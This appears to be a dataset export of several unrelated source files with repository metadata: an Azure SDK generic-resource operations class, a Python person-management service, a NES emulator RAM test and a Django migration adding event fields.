'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def check_existence_by_id(
self, resource_id, custom_headers=None, raw=False, **operation_config):
"""Checks by ID whether a resource exists.
:param resource_id: The fully qualified ID of the resource, including
the resource name and resource type. Use the format,
/subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
:type resource_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: bool or ClientRawResponse if raw=true
:rtype: bool or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.check_existence_by_id.metadata['url']
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.head(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204, 404]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = (response.status_code == 204)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_existence_by_id.metadata = {'url': '/{resourceId}'}
def _delete_by_id_initial(
self, resource_id, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_by_id.metadata['url']
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_by_id(
self, resource_id, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes a resource by ID.
:param resource_id: The fully qualified ID of the resource, including
the resource name and resource type. Use the format,
/subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
:type resource_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_by_id_initial(
resource_id=resource_id,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_by_id.metadata = {'url': '/{resourceId}'}
def _create_or_update_by_id_initial(
self, resource_id, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update_by_id.metadata['url']
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GenericResource')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if response.status_code == 201:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update_by_id(
self, resource_id, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create a resource by ID.
:param resource_id: The fully qualified ID of the resource, including
the resource name and resource type. Use the format,
/subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
:type resource_id: str
:param parameters: Create or update resource parameters.
:type parameters:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GenericResource or
ClientRawResponse<GenericResource> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_by_id_initial(
resource_id=resource_id,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update_by_id.metadata = {'url': '/{resourceId}'}
def _update_by_id_initial(
self, resource_id, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.update_by_id.metadata['url']
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GenericResource')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_by_id(
self, resource_id, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates a resource by ID.
:param resource_id: The fully qualified ID of the resource, including
the resource name and resource type. Use the format,
/subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
:type resource_id: str
:param parameters: Update resource parameters.
:type parameters:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GenericResource or
ClientRawResponse<GenericResource> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_by_id_initial(
resource_id=resource_id,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_by_id.metadata = {'url': '/{resourceId}'}
def get_by_id(
self, resource_id, custom_headers=None, raw=False, **operation_config):
"""Gets a resource by ID.
:param resource_id: The fully qualified ID of the resource, including
the resource name and resource type. Use the format,
/subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
:type resource_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: GenericResource or ClientRawResponse if raw=true
:rtype:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_by_id.metadata['url']
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_by_id.metadata = {'url': '/{resourceId}'}
| [
"zikalino@microsoft.com"
] | zikalino@microsoft.com |
af1f62d0bf863e6597fbe007f00340142d4450ce | 16b2c2365eff11f34ae260321e6dde78ab09b45d | /api/api_services/PersonService.py | 14c5f4056460582f3abd2dd4a7f5dc56475455ed | [] | no_license | laken11/TMS | bf941802e350a16db0f2314330ad315e73ce48f0 | c271f2cbb1624ab943c10bacaa6406ec8ca08083 | refs/heads/dev | 2023-04-27T22:03:38.811267 | 2021-05-08T12:06:54 | 2021-05-08T12:06:54 | 362,518,465 | 0 | 0 | null | 2021-05-05T10:07:54 | 2021-04-28T15:27:28 | Python | UTF-8 | Python | false | false | 1,823 | py | from abc import ABCMeta, abstractmethod
from typing import List
from api.api_dto.PersonDto import *
from api.api_repository.PersonRepository import PersonRepository
class PersonManagementService(metaclass=ABCMeta):
@abstractmethod
def create_person(self, model: CreatePersonDto):
"""Create a person object"""
raise NotImplementedError
@abstractmethod
def update_person(self, person_id, model: UpdatePersonDto):
"""Update a person object"""
raise NotImplementedError
@abstractmethod
def list_person(self) -> List[ListPersonDto]:
"""List all person objects"""
raise NotImplementedError
@abstractmethod
def person_details(self, person_id, model: PersonDetailsDto):
"""Details of a person object"""
raise NotImplementedError
@abstractmethod
def update_person_role(self, person_id, model: UpdatePersonRoleDto):
"""Updating a person role"""
raise NotImplementedError
class DefaultPersonManagementService(PersonManagementService):
repository: PersonRepository
def __init__(self, repository: PersonRepository):
self.repository = repository
def create_person(self, model: CreatePersonDto):
return self.repository.create_person(model=model)
def update_person(self, person_id, model: UpdatePersonDto):
return self.update_person(person_id=person_id, model=model)
def list_person(self) -> List[ListPersonDto]:
return self.repository.list_person()
def person_details(self, person_id, model: PersonDetailsDto):
return self.repository.person_details(person_id=person_id, model=model)
def update_person_role(self, person_id, model: UpdatePersonRoleDto):
return self.repository.update_person_role(person_id=person_id, model=model) | [
"omitogunopeyemi@gmail.com"
] | omitogunopeyemi@gmail.com |
4f31d3739a8a0169184bb538944118b6f95aec4a | fd4df5cf34f8427153bf01d25c39ded9315b8d6a | /tests/test_ram.py | 7a12aff7cec9d97af7a57edbc2623b3b2f0b1518 | [
"BSD-2-Clause"
] | permissive | jepebe/nes | 9ac00e89cf474b7811020d18bf7fd8f15b556339 | 79e6ad689473b7a3a4f3b6d7cf2c381220fcf140 | refs/heads/master | 2023-01-05T22:38:30.714836 | 2020-10-26T07:33:10 | 2020-10-26T07:33:10 | 300,615,959 | 1 | 1 | null | 2020-10-26T07:33:11 | 2020-10-02T13:01:36 | Python | UTF-8 | Python | false | false | 567 | py | from nes.bus import Bus
class TestCartridge:
def cpu_write(self, addt, value):
return None
def cpu_read(self, addr):
return None
def test_ram():
bus = Bus()
bus.insert_cartridge(TestCartridge())
for addr in range(0x0000, 0x800):
bus.cpu_write(addr, 0xff)
assert bus.cpu_read(addr) == 0xff
bus.cpu_write(0x700, 0x7f)
assert bus.cpu_read(0x700) == 0x7f
assert bus.cpu_read(0x700 + 0x800) == 0x7f
assert bus.cpu_read(0x700 + 0x800 * 2) == 0x7f
assert bus.cpu_read(0x700 + 0x800 * 3) == 0x7f
| [
"jepebe@users.noreply.github.com"
] | jepebe@users.noreply.github.com |
e48a0f65f7443f01f4836af97597bfa424e10120 | eb82bd9ed38ccf06cc2c0aafd1a64b9c88063f5f | /mysite/sign/migrations/0002_auto_20180709_1332.py | 278599b58f0e2b085a3944e2a960f8e3a1b5d4dc | [] | no_license | cophoto/pydev | 3ca2e1307f20e37ba79869fcbc5ddecacf52a8d0 | 8b3db7a8f5110a94500f7e50b627408fddc9f80b | refs/heads/master | 2020-03-22T15:57:31.820284 | 2018-07-11T01:41:07 | 2018-07-11T01:41:07 | 140,292,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | # Generated by Django 2.0.7 on 2018-07-09 05:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sign', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='event',
name='limit',
field=models.IntegerField(default=1),
preserve_default=False,
),
migrations.AddField(
model_name='event',
name='status',
field=models.BooleanField(default=True),
preserve_default=False,
),
]
| [
"davidliu.net@gmail.com"
] | davidliu.net@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.